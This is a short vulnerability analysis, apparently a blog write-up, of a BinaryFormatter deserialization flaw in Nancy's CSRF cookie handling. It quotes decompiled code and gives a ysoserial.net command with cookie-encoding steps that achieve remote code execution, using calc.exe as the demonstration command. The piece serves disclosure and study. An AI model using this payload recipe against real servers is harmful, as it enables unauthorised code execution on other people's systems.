Nancy Deserialization Vulnerability Analysis
Preface
Let's look at an interesting .NET deserialization case; this is a short write-up.
Vulnerability Analysis
Download the demo project from GitHub: https://github.com/NancyFx/Nancy.Demo.Samples
Build and run it.
Some of the helper classes are not in the sample sources but in the referenced Nancy DLL, so the snippets below are read from the decompiled assembly.
The vulnerable code is in Nancy.Security.Csrf.Enable. At application startup, Initialize calls it to enable the CSRF module, which registers the following hook in the request pipeline:
```csharp
// Decompiled from the pipeline hook registered by Nancy.Security.Csrf.Enable
if (context.Response == null || context.Response.Cookies == null)
{
    return;
}
if (context.Items.ContainsKey("NCSRF"))
{
    context.Response.Cookies.Add(new NancyCookie("NCSRF", (string)context.Items["NCSRF"], true));
    return;
}
if (context.Request.Cookies.ContainsKey("NCSRF"))
{
    // Sink: attacker-controlled cookie -> UrlDecode -> BinaryFormatter.Deserialize
    string text = HttpUtility.UrlDecode(context.Request.Cookies["NCSRF"]);
    CsrfToken cookieToken = CsrfApplicationStartup.ObjectSerializer.Deserialize(text) as CsrfToken;
    // ... remainder of the hook (token validation) is not shown on this page
}
```
The hook checks whether the request cookies contain NCSRF. If they do, it takes the NCSRF cookie value, URL-decodes it, and deserializes it, casting the result to CsrfToken. Note that the `as CsrfToken` cast runs only after deserialization has completed, so it gives no protection: whatever type the stream names has already been instantiated by then.
```csharp
// Decompiled from Nancy's DefaultObjectSerializer
public object Deserialize(string sourceString)
{
    if (string.IsNullOrEmpty(sourceString))
    {
        return null;
    }
    object result;
    try
    {
        byte[] buffer = Convert.FromBase64String(sourceString);
        // No SerializationBinder is set: any type named in the stream is instantiated
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        using (MemoryStream memoryStream = new MemoryStream(buffer, false))
        {
            result = binaryFormatter.Deserialize(memoryStream);
        }
    }
    // The page's snippet stops before the catch clauses; they are restored here so the method compiles
    catch (FormatException)        // invalid base64
    {
        return null;
    }
    catch (SerializationException)
    {
        return null;
    }
    return result;
}
```
The NCSRF cookie content is base64-decoded and then deserialized with BinaryFormatter, with no SerializationBinder or other type restriction, so any BinaryFormatter gadget chain will run.
Now let's build the POC with ysoserial.net:
```powershell
ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "calc.exe"
```
The base64 output goes into the NCSRF cookie. Because the server runs HttpUtility.UrlDecode on the cookie first, the payload should be URL-encoded (in particular `+` must be sent as `%2B`, otherwise it decodes to a space and corrupts the base64).
The response is a 500, but the command has executed successfully: the gadget chain fires inside BinaryFormatter.Deserialize, before the `as CsrfToken` cast (which yields null for the gadget object) and before anything downstream can reject the cookie.